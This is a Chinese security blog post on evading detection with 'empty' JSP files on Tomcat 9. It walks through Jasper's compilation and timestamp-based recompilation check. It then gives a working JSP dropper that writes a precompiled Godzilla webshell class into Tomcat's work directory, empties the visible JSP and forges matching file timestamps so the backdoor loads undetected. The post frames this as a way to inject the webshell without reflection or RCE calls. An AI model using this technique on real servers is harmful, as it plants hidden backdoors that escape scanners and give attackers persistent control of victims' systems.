<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.4.2">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"kaikaix.github.io","root":"/","scheme":"Pisces","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":true,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":true,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":"gitalk","storage":true,"lazyload":false,"nav":null,"activeClass":"gitalk"},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":5,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="环境搭配tomcat 9.0.80 推荐看如下教程去搭建debug环境https:&#x2F;&#x2F;gitee.com&#x2F;appleyk&#x2F;tomact9-markdown">
<meta property="og:type" content="article">
<meta property="og:title" content="空文件jsp免杀">
<meta property="og:url" content="https://kaikaix.github.io/2024/08/20/%E7%A9%BA%E6%96%87%E4%BB%B6jsp%E5%85%8D%E6%9D%80/index.html">
<meta property="og:site_name" content="kaikaix">
<meta property="og:description" content="环境搭配tomcat 9.0.80 推荐看如下教程去搭建debug环境https:&#x2F;&#x2F;gitee.com&#x2F;appleyk&#x2F;tomact9-markdown">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://kaikaix.github.io/2024/08/20/%E7%A9%BA%E6%96%87%E4%BB%B6jsp%E5%85%8D%E6%9D%80/2.png">
<meta property="og:image" content="https://kaikaix.github.io/2024/08/20/%E7%A9%BA%E6%96%87%E4%BB%B6jsp%E5%85%8D%E6%9D%80/3.png">
<meta property="og:image" content="https://kaikaix.github.io/2024/08/20/%E7%A9%BA%E6%96%87%E4%BB%B6jsp%E5%85%8D%E6%9D%80/4.png">
<meta property="og:image" content="https://kaikaix.github.io/2024/08/20/%E7%A9%BA%E6%96%87%E4%BB%B6jsp%E5%85%8D%E6%9D%80/6.png">
<meta property="og:image" content="https://kaikaix.github.io/2024/08/20/%E7%A9%BA%E6%96%87%E4%BB%B6jsp%E5%85%8D%E6%9D%80/5.png">
<meta property="og:image" content="https://kaikaix.github.io/2024/08/20/%E7%A9%BA%E6%96%87%E4%BB%B6jsp%E5%85%8D%E6%9D%80/7.png">
<meta property="og:image" content="https://kaikaix.github.io/2024/08/20/%E7%A9%BA%E6%96%87%E4%BB%B6jsp%E5%85%8D%E6%9D%80/8.png">
<meta property="og:image" content="https://kaikaix.github.io/2024/08/20/%E7%A9%BA%E6%96%87%E4%BB%B6jsp%E5%85%8D%E6%9D%80/9.png">
<meta property="og:image" content="https://kaikaix.github.io/2024/08/20/%E7%A9%BA%E6%96%87%E4%BB%B6jsp%E5%85%8D%E6%9D%80/7.png">
<meta property="article:published_time" content="2024-08-20T11:05:13.000Z">
<meta property="article:modified_time" content="2024-08-20T13:56:48.112Z">
<meta property="article:author" content="kaikaix">
<meta property="article:tag" content="代码审计">
<meta property="article:tag" content="java">
<meta property="article:tag" content="tomcat">
<meta property="article:tag" content="jsp">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://kaikaix.github.io/2024/08/20/%E7%A9%BA%E6%96%87%E4%BB%B6jsp%E5%85%8D%E6%9D%80/2.png">

<link rel="canonical" href="https://kaikaix.github.io/2024/08/20/%E7%A9%BA%E6%96%87%E4%BB%B6jsp%E5%85%8D%E6%9D%80/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>空文件jsp免杀 | kaikaix</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

<link rel="alternate" href="/atom.xml" title="kaikaix" type="application/atom+xml">
</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">kaikaix</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">小白</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>
  <div class="reading-progress-bar"></div>
  <a role="button" class="book-mark-link book-mark-link-fixed"></a>

  <a href="https://github.com/kaikaix" class="github-corner" title="Follow me on GitHub" aria-label="Follow me on GitHub" rel="noopener" target="_blank"><svg width="80" height="80" viewBox="0 0 250 250" aria-hidden="true"><path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path><path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2" fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path><path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z" fill="currentColor" class="octo-body"></path></svg></a>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://kaikaix.github.io/2024/08/20/%E7%A9%BA%E6%96%87%E4%BB%B6jsp%E5%85%8D%E6%9D%80/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/cat.jpg">
      <meta itemprop="name" content="kaikaix">
      <meta itemprop="description" content="小白">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="kaikaix">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          空文件jsp免杀
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>
              

              <time title="创建时间：2024-08-20 19:05:13 / 修改时间：21:56:48" itemprop="dateCreated datePublished" datetime="2024-08-20T19:05:13+08:00">2024-08-20</time>
            </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/java/" itemprop="url" rel="index"><span itemprop="name">java</span></a>
                </span>
            </span>

          
            <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span id="busuanzi_value_page_pv"></span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="环境搭配"><a href="#环境搭配" class="headerlink" title="环境搭配"></a>环境搭配</h1><p>tomcat 9.0.80</p>
<p>推荐看如下教程去搭建debug环境<br><a target="_blank" rel="noopener" href="https://gitee.com/appleyk/tomact9-markdown">https://gitee.com/appleyk/tomact9-markdown</a><br><span id="more"></span></p>
<h1 id="jsp解析"><a href="#jsp解析" class="headerlink" title="jsp解析"></a>jsp解析</h1><p>Tomcat处理jsp的核心逻辑是它实现了一个处理jsp的Servlet<br><code>org.apache.jasper.servlet.JspServlet</code> ，这个Servlet处理所有以jsp和jspx为后缀的请求。</p>
<p>编译jsp的过程如下</p>
<ol>
<li>将jsp文件包装成java文件</li>
<li>将java文件编译为class文件</li>
<li>通过newInstance加载编译的class文件</li>
</ol>
<p>主要编译代码从这里开始<br><code>org.apache.jasper.JspCompilationContext#compile()</code><br><img src="/2024/08/20/%E7%A9%BA%E6%96%87%E4%BB%B6jsp%E5%85%8D%E6%9D%80/2.png" alt></p>
<p>跟入 <code>jspCompiler.compile();</code> 可以看到两行重要代码，先生成java文件，然后根据java文件生成class文件<br><img src="/2024/08/20/%E7%A9%BA%E6%96%87%E4%BB%B6jsp%E5%85%8D%E6%9D%80/3.png" alt></p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Map&lt;String,SmapStratum&gt; smaps = generateJava();</span><br><span class="line">generateClass(smaps);</span><br></pre></td></tr></table></figure>
<p>编译后就通过反射去获取该servlet<br><img src="/2024/08/20/%E7%A9%BA%E6%96%87%E4%BB%B6jsp%E5%85%8D%E6%9D%80/4.png" alt><br><img src="/2024/08/20/%E7%A9%BA%E6%96%87%E4%BB%B6jsp%E5%85%8D%E6%9D%80/6.png" alt><br><img src="/2024/08/20/%E7%A9%BA%E6%96%87%E4%BB%B6jsp%E5%85%8D%E6%9D%80/5.png" alt></p>
<p>最后会将实例赋值给成员变量<br><img src="/2024/08/20/%E7%A9%BA%E6%96%87%E4%BB%B6jsp%E5%85%8D%E6%9D%80/7.png" alt></p>
<p>后面你访问的jsp，其实就相当于在访问这个servlet<br>详细步骤需要自己调试</p>
<h1 id="空文件jsp"><a href="#空文件jsp" class="headerlink" title="空文件jsp"></a>空文件jsp</h1><p>根据上述原理，其实只要可以直接写入该class文件，那么jsp的内容应该是无关紧要的<br>根据调试，发现编译出来的class文件位于<br><img src="/2024/08/20/%E7%A9%BA%E6%96%87%E4%BB%B6jsp%E5%85%8D%E6%9D%80/8.png" alt><br>但是如果直接去写入这个class文件是没有用的，经过我个人测试</p>
<ul>
<li>只修改class文件，然后访问那个jsp，会被重新编译</li>
<li>只修改java文件，不会被继续编译，class还是最初的</li>
</ul>
<p>回到刚刚的tomcat编译jsp的源码<br><img src="/2024/08/20/%E7%A9%BA%E6%96%87%E4%BB%B6jsp%E5%85%8D%E6%9D%80/9.png" alt><br>注意到这个<br><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">jspCompiler.isOutDated()</span><br></pre></td></tr></table></figure><br>这个函数用于检测你的jsp是否有修改过，如果修改过就会重新编译，那么来看看内部细节是怎么检测的<br><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><span class="line">File targetFile;</span><br><span class="line"><span class="keyword">if</span> (checkClass) &#123;</span><br><span class="line">    targetFile = <span class="keyword">new</span> <span class="title class_">File</span>(ctxt.getClassFileName());</span><br><span class="line">&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">    targetFile = <span class="keyword">new</span> <span class="title class_">File</span>(ctxt.getServletJavaFileName());</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">if</span> (!targetFile.exists()) &#123;</span><br><span class="line">    <span class="keyword">return</span> <span class="literal">true</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="type">long</span> <span class="variable">targetLastModified</span> <span class="operator">=</span> targetFile.lastModified();</span><br><span class="line"><span class="keyword">if</span> (checkClass &amp;&amp; jsw != <span class="literal">null</span>) &#123;</span><br><span class="line">    jsw.setServletClassLastModifiedTime(targetLastModified);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="type">Long</span> <span class="variable">jspRealLastModified</span> <span class="operator">=</span> ctxt.getLastModified(ctxt.getJspFile());</span><br><span class="line"><span class="keyword">if</span> (jspRealLastModified.longValue() &lt; <span class="number">0</span>) &#123;</span><br><span class="line">    <span class="comment">// Something went wrong - assume modification</span></span><br><span class="line">    <span class="keyword">return</span> <span class="literal">true</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (targetLastModified != jspRealLastModified.longValue()) &#123;</span><br><span class="line">    <span class="keyword">if</span> (log.isDebugEnabled()) &#123;</span><br><span class="line">        log.debug(<span class="string">&quot;Compiler: outdated: &quot;</span> + targetFile + <span class="string">&quot; &quot;</span></span><br><span class="line">                + targetLastModified);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> <span class="literal">true</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">// determine if source dependent files (e.g. includes using include</span></span><br><span class="line"><span class="comment">// directives) have been changed.</span></span><br><span class="line"><span class="keyword">if</span> (jsw == <span class="literal">null</span>) &#123;</span><br><span class="line">    <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">Map&lt;String,Long&gt; depends = jsw.getDependants();</span><br><span class="line"><span class="keyword">if</span> (depends == <span class="literal">null</span>) &#123;</span><br><span class="line">    <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><br>看到上面的代码，可以知道他会拿jsp的时间戳与class的时间戳进行比对，如果不一致就会重新编译</p>
<blockquote>
<p>在重新编译后会将class文件的时间戳设置为jsp的时间戳<br>这个 depends 应该是include里面需要编译的文件，没测试过</p>
</blockquote>
<p>那么修改class以后就会改变时间戳，所以导致刚刚测试会重新编译</p>
<p>这里还有一个需要注意的点就是<br>刚刚分析代码的时候提到过<br>servlet会将实例赋值给成员变量，你之后在不更改jsp的情况下，访问的都是已经加载在内存中的servlet<br><img src="/2024/08/20/%E7%A9%BA%E6%96%87%E4%BB%B6jsp%E5%85%8D%E6%9D%80/7.png" alt></p>
<p>所以如果想写一个jsp，然后去写入该jsp的class文件，在把自身写入的东西清楚掉，伪代码类似下面<br><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">写入恶意class</span><br><span class="line">清空自身文件内容</span><br><span class="line">改变class文件和自身jsp为相同的时间戳</span><br></pre></td></tr></table></figure><br>然后在去访问该jsp，你会发现这个jsp还是之前的功能，并不会是恶意的class文件的功能，因为他已经把之前的class内容加载到内存中了<br>那么这里我能想到有两个解决方案</p>
<ul>
<li>重启tomcat，让他重新加载class文件</li>
<li>写入其他jsp，比如用一个a.jsp写入b.jsp和b_jsp.class</li>
</ul>
<h1 id="最终代码"><a href="#最终代码" class="headerlink" title="最终代码"></a>最终代码</h1><p>我直接将哥斯拉的jsp生成的class文件复制出来，没有特别去生成<br>这样下面的代码在不涉及任何反射和rce函数，只操控文件的方法下完成了哥斯拉jsp🐴的注入</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br></pre></td><td class="code"><pre><span class="line">&lt;%@ page <span class="keyword">import</span>=<span class="string">&quot;java.io.*&quot;</span> %&gt;</span><br><span class="line">&lt;%@ page <span class="keyword">import</span>=<span class="string">&quot;java.util.Base64&quot;</span> %&gt;</span><br><span class="line">&lt;%@ page <span class="keyword">import</span>=<span class="string">&quot;java.nio.file.*&quot;</span> %&gt;</span><br><span class="line">&lt;%@ page <span class="keyword">import</span>=<span class="string">&quot;java.nio.file.attribute.*&quot;</span> %&gt;</span><br><span class="line">&lt;%@ page <span class="keyword">import</span>=<span class="string">&quot;java.io.*&quot;</span> %&gt;</span><br><span class="line">&lt;%@ page <span class="keyword">import</span>=<span class="string">&quot;java.util.concurrent.TimeUnit&quot;</span> %&gt;</span><br><span class="line">&lt;%</span><br><span class="line">    <span class="comment">// 文件路径</span></span><br><span class="line"></span><br><span class="line">    <span class="type">String</span> <span class="variable">filePathJSP</span> <span class="operator">=</span> application.getRealPath(<span class="string">&quot;/&quot;</span>) + <span class="string">&quot;output.jsp&quot;</span>;</span><br><span class="line">    <span class="type">String</span> <span class="variable">fullPath</span> <span class="operator">=</span> application.getRealPath(request.getRequestURI());</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 创建 File 对象</span></span><br><span class="line">    <span class="type">File</span> <span class="variable">file</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">File</span>(fullPath);</span><br><span class="line">    <span class="type">String</span> <span class="variable">folderName</span> <span class="operator">=</span> file.getParentFile().getName();</span><br><span class="line"></span><br><span class="line">    <span class="type">String</span> <span class="variable">filePathCLASS</span> <span class="operator">=</span> application.getRealPath(<span class="string">&quot;/&quot;</span>) +<span class="string">&quot;../../work/Catalina/localhost/&quot;</span>+folderName+<span class="string">&quot;/org/apache/jsp/output_jsp.class&quot;</span>;</span><br><span class="line">    <span class="type">String</span> <span class="variable">filePathCLASSX</span> <span class="operator">=</span> application.getRealPath(<span class="string">&quot;/&quot;</span>) +<span class="string">&quot;../../work/Catalina/localhost/&quot;</span>+folderName+<span class="string">&quot;/org/apache/jsp/output_jsp$X.class&quot;</span>;</span><br><span class="line"></span><br><span class="line">    String[] paths = &#123;filePathJSP,filePathCLASS,filePathCLASSX&#125;;</span><br><span class="line"></span><br><span class="line">    String[] contents = &#123;</span><br><span class="line">            <span class="string">&quot;&quot;</span>,</span><br><span class="line">            <span class="string">&quot;&quot;</span>,</span><br><span class="line">            <span class="string">&quot;&quot;</span></span><br><span class="line">    &#125;;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 创建 FileWriter 对象</span></span><br><span class="line">    <span class="keyword">for</span> (<span class="type">int</span> <span class="variable">i</span> <span class="operator">=</span> <span class="number">0</span>; i &lt; <span class="number">3</span>; i++) &#123;</span><br><span class="line">        <span class="type">String</span> <span class="variable">path</span> <span class="operator">=</span> paths[i];</span><br><span class="line">        <span class="type">String</span> <span class="variable">encodedContent</span> <span class="operator">=</span> contents[i];</span><br><span class="line"></span><br><span class="line">        <span class="comment">// Base64 解码</span></span><br><span class="line">        <span class="type">byte</span>[] decodedBytes = Base64.getDecoder().decode(encodedContent);</span><br><span class="line"></span><br><span class="line">        <span class="type">FileOutputStream</span> <span class="variable">fileOutputStream</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">FileOutputStream</span>(path);</span><br><span class="line">        fileOutputStream.write(decodedBytes);</span><br><span class="line"></span><br><span class="line">        <span class="comment">// 关闭 FileOutputStream</span></span><br><span class="line">        fileOutputStream.close();</span><br><span class="line">        <span class="comment">// 输出确认信息</span></span><br><span class="line">        out.println(<span class="string">&quot;Content written successfully to: &quot;</span> + path + <span class="string">&quot;&lt;br&gt;&quot;</span>);</span><br><span class="line">        <span class="keyword">try</span> &#123;</span><br><span class="line">            <span class="comment">// 获取文件路径对象</span></span><br><span class="line">            <span class="type">Path</span> <span class="variable">p</span> <span class="operator">=</span> Paths.get(path);</span><br><span class="line">            <span class="type">long</span> <span class="variable">newTimestamp</span> <span class="operator">=</span> <span class="number">1724085293L</span>;</span><br><span class="line">            <span class="comment">// 将时间戳转换为 FileTime 对象</span></span><br><span class="line">            <span class="type">FileTime</span> <span class="variable">fileTime</span> <span class="operator">=</span> FileTime.from(newTimestamp, TimeUnit.SECONDS);</span><br><span class="line"></span><br><span class="line">            <span class="comment">// 更改文件的修改时间和访问时间</span></span><br><span class="line">            Files.setLastModifiedTime(p, fileTime);</span><br><span class="line"></span><br><span class="line">            out.println(<span class="string">&quot;File timestamp updated successfully.&quot;</span>);</span><br><span class="line">        &#125; <span class="keyword">catch</span> (IOException e) &#123;</span><br><span class="line">            out.println(<span class="string">&quot;Error updating file timestamp: &quot;</span> + e.getMessage());</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">%&gt;</span><br><span class="line"></span><br></pre></td></tr></table></figure><link rel="stylesheet" href="/css/spoiler.css" type="text/css"><script src="/js/spoiler.js" type="text/javascript" async></script>
    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/" rel="tag"># 代码审计</a>
              <a href="/tags/java/" rel="tag"># java</a>
              <a href="/tags/tomcat/" rel="tag"># tomcat</a>
              <a href="/tags/jsp/" rel="tag"># jsp</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2024/06/12/awdp-web-%E5%B0%8F%E7%99%BD/" rel="prev" title="awdp-web-小白">
      <i class="fa fa-chevron-left"></i> awdp-web-小白
    </a></div>
      <div class="post-nav-item"></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          
    <div class="comments" id="gitalk-container"></div>

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E7%8E%AF%E5%A2%83%E6%90%AD%E9%85%8D"><span class="nav-number">1.</span> <span class="nav-text">环境搭配</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#jsp%E8%A7%A3%E6%9E%90"><span class="nav-number">2.</span> <span class="nav-text">jsp解析</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E7%A9%BA%E6%96%87%E4%BB%B6jsp"><span class="nav-number">3.</span> <span class="nav-text">空文件jsp</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E6%9C%80%E7%BB%88%E4%BB%A3%E7%A0%81"><span class="nav-number">4.</span> <span class="nav-text">最终代码</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="kaikaix"
      src="/images/cat.jpg">
  <p class="site-author-name" itemprop="name">kaikaix</p>
  <div class="site-description" itemprop="description">小白</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">55</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">19</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">48</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2024</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">kaikaix</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://pisces.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Pisces</a> 强力驱动
  </div>

        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>








      </div>
